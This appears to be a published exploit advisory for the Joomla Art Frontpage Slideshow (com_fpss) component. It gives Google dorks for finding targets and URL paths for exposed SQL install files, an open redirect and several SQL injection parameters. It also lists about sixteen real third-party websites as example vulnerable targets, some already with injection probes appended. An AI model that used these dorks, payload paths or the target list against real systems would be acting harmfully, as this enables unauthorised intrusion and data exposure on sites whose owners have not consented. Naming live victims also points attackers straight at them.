#################################################################################################### # Exploit Title : Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 19/01/2019 # Vendor Homepage : artetics.com # Software Information Link : joomlaworks.net/extensions/commercial/frontpage-slideshow # Software Download Link : extensions.joomla.org/extension/art-frontpage-slideshow/ # Affected Versions : 1.5.3 and 1.6.0 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:/index.php?option=com_fpss inurl:''/administrator/components/com_fpss/'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] #################################################################################################### Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection #################################################################################################### # Description : ************* Art Frontpage Slideshow is a slideshow module that adds front end animation that attracts visitors and allows to show images of featured products and news in a nice eye-catching way. #################################################################################################### # Database Disclosure Exploit : *************************** /administrator/components/com_fpss/fpss.sql /administrator/components/com_fpss/install.mysql.sql /administrator/components/com_fpss/install.mysql.sql # Open Redirection Exploit : ************************* /index.php?option=com_fpss&task=track&id=[ID-NUMBER]&url=[SITE-ADDRESS] # SQL Injection Exploit : *********************** /index.php?option=com_fpss&task=module&id=[ID-NUMBER]&format=feed&type=[SQL Injection] /index.php?option=com_fpss&task=module&id=[ID-NUMBER] &format=feed&type=atom&lang=[SQL Injection] /index.php?option=com_fpss&view=article&id=[ID-NUMBER] :article-[ARTICLE-NUMBER]&catid=[ID-NUMBER]:articles&Itemid=[SQL Injection] #################################################################################################### # Example Vulnerable Sites : ************************* [+] kancelarija.org.mk/index.php?option=com_fpss&task=module&id=87&format=feed&type=atom&lang=1%27 [+] spalya.com.mx/index.php?option=com_fpss&view=article&id=282:article-3&catid=41:articles&Itemid=450%27 [+] uaddigital.com/main/index.php?option=com_fpss&task=module&id=27&format=feed&type=1%27 [+] cvbsaude.org/administrator/components/com_fpss/install.mysql.sql [+] bio.demokritos.gr/new_site/administrator/components/com_fpss/fpss.sql [+] akademisinergi.com/administrator/components/com_fpss/install.mysql.sql [+] studioscosta.gr/tmp/administrator/components/com_fpss/install.mysql.sql [+] fupacnl.com.br/picture_library/administrator/components/com_fpss/install.mysql.sql [+] pathfinderindemnity.com/administrator/components/com_fpss/install.mysql.sql [+] alkartasunalizeoa.eus/administrator/components/com_fpss/install.mysql.sql [+] muslimfamilyservices.org/site/administrator/components/com_fpss/install.mysql.sql [+] shswadsworth.org/administrator/components/com_fpss/install.mysql.sql [+] tjnisseki.com/administrator/components/com_fpss/install.mysql.sql [+] telecomreviewna.com/administrator/components/com_fpss/install.mysql.sql [+] waterpng.com.pg/site/administrator/components/com_fpss/install.mysql.sql [+] marinelog.com/administrator/components/com_fpss/install.mysql.sql #################################################################################################### # Example SQL Database Error : Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/content/64/4351964/html/configuration.php:1) in /home/content/64/4351964/html/libraries/joomla/session/session.php on line 423 Strict Standards: Non-static method JLoader::import() should not be called statically in /home/uadvirtual/public_html/main /libraries/joomla/import.php on line 29 #################################################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################################################